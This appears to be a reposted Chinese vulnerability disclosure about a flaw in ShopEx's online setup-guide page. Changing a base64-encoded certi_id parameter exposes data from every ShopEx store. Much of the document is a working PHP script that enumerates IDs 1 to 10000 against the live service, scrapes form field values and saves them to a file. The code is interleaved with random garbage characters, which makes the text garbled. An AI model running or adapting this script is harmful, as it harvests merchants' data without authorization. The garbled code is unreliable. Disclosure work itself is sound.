简要描述:
ShopEx某接口缺陷,可遍历所有网站

详细说明:

问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
修改 certi_id 即可遍历所有使用了ShopEx程序的网站
- \9 ~7 w9 Q) ]- [6 ^<?php) J) i8 t3 O. T& o
" \- M1 |2 o; \* c9 M for ($i=1; $i < 10000; $i++) { //遍历+ e: n- m- x" R0 Y
|* \/ l% _2 N3 d ShowshopExD($i);
% H& V0 u' m) [; p0 r* v% _7 s( w
# Y9 R. f* x; v, _7 G }/ i; |' t H* C! K; i
" o8 e* E7 t9 p
function ShowshopExD($cid) {
. |+ i9 T4 G& |% o9 k H% C
" A+ l7 t9 G0 j3 f8 g $url='http://guide.ecos.shopex.cn/step2.php';
) p- P8 _* U3 a0 }$ m9 T r H: b% V5 w5 q
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
: m& B# j( [0 a
/ f$ A' p: N) p& [8 }, A% s $url = $url.'?refer='.$refer;
) \! X" A3 a4 V! {, M+ Q8 \; Y5 @9 L2 m4 I ?" \
$ch = curl_init($url);
V; A# ~, f# F4 X2 i6 q8 p I A! ]% [$ ]8 h+ x! Y/ t
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;, n3 c; b/ u2 c2 n& s: Y
# o1 [4 ~; D2 g" p
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;( p- U) f0 f# i2 Q
, G* _: p& L0 R- ]' `. |! M+ l $result = curl_exec($ch);
: `0 S! T+ V8 C7 M L5 }' P( u- r
6 O9 L7 F5 m X $result = mb_convert_encoding($result, "gb2312", "UTF-8");
5 S$ Q, a/ d: @0 s" E& T+ `8 w% {- @- G4 ?3 R
if(strpos($result,$refer))1 T$ X. |, i6 }: K
q2 ^ f" n1 L9 H8 K% E9 Y$ p
{
/ y( N8 B* I# e } [3 u; X, {8 o, v: T/ s- f( ~
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件" e; ?5 G0 h; m3 I9 H
' g0 G. X& U; s6 @
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);. y1 _' ?" D T0 j
+ ]1 w6 T) H9 r2 ^! T) R
foreach ($value[1] as $key) {& f" h' n# R3 A' r* r: p5 o6 s
' O2 ^9 b8 e* x7 K# W7 d* [0 m. p8 } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
?3 J3 l+ H1 J: c3 w* o0 A1 L4 x6 p: @% C) ]# U7 d
echo $res[1][0].':'.$res[3][0]."\r\n";2 V( z3 l+ d" |1 ]( Y: E* V
! s9 r5 R, [& \4 {! b $col =$res[1][0].':'.$res[3][0]."\r\n";
) F# m9 M6 `: [5 |& g: P% l: D* y1 C( V1 Z s: m% A# r
fwrite($fp, $col, strlen($col));
w* x! Z1 B- ~" y* o) n T u+ L! D/ ?+ d1 e1 w
}$ P6 S2 `7 _+ t
( ~# S5 @# {8 Z! D echo '--------------------------------'."\r\n";" Q5 d; }/ n* k- U: W- r
9 b- d6 ~7 a0 M6 ?. A. E
fclose($fp);
+ m0 a. G1 ?6 ?5 X+ q. N, [, k6 ~5 P
}
7 f# L8 }, ]8 V+ [8 N3 v9 f5 ]
, u% Q- [2 b" | X Y* }8 O! B flush();$ v4 f- M# k% T" j# T8 n+ }8 O
1 B& z: d7 Q$ S" y) B7 ]6 r curl_close($ch);
9 m% J+ d2 b* M2 n! F6 r+ r2 g, f- j* a9 W' {# @
}. M) `7 w0 y- ]" ]1 N" ?
! r+ M$ ^! c9 B% |6 [?>) U2 W) _5 _ q# m0 m9 S8 X( G
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg

refer 换成其他加密方式